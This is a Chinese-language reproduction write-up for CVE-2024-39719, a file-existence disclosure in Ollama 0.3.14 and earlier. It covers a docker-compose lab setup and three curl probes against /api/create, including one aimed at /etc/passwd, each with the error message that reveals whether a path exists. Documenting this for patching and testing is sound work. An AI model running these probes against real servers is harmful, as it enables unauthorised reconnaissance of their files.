# Ollama 文件存在性泄露漏洞 CVE-2024-39719 ## 漏洞描述 Ollama 0.3.14 及之前的版本中,攻击者可以通过 `api/create` 端点触发文件存在性泄露(File Existence Disclosure)漏洞。当调用 `CreateModel` 并传递一个不存在的路径参数时,服务器会直接返回 `"File does not exist"`(文件不存在)的错误消息。该漏洞允许攻击者探测服务器上特定文件是否存在,进而造成信息泄露。 参考链接: - https://github.com/advisories/GHSA-cpxh-jwhh-m496 - https://oligosecurity.webflow.io/blog/more-models-more-probllms - https://github.com/ollama/ollama/releases/tag/v0.1.47 - https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349 ## 漏洞影响 ``` Ollama ≤ 0.3.14 ``` ## 环境搭建 docker-compose.yml ``` services: ollama: image: ollama/ollama:0.3.14 container_name: ollama volumes: - ollama:/root/.ollama ports: - "11434:11434" volumes: ollama: ``` 执行如下命令启动 Ollama 0.3.14 服务: ``` docker compose up -d ``` 环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.3.14 已经成功运行。 ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305134942768.png) ## 漏洞复现 使用 `curl` 命令向本地服务器发送请求,创建一个名为 `file-leak-existence` 的文件。 文件不存在时,将报错 `no such file or directory`: ``` curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}' ----- {"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"} ``` ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135226934.png) 文件存在时,将报错 `command must be one of "from", "license", "template", "system", "adapter", "parameter", or "message"`: ``` curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}' ----- {"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}% e ``` ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135433566.png) 传入目录而非文件路径时候,将报错 `{"error":"read /xxx: is a directory"}`: ``` curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc"}' ----- {"error":"read /etc: is a directory"}% ``` ![](images/Ollama%20文件存在性泄露漏洞%20CVE-2024-39719/image-20250305135606639.png) ## 漏洞修复 - 升级至最新版本 https://github.com/ollama/ollama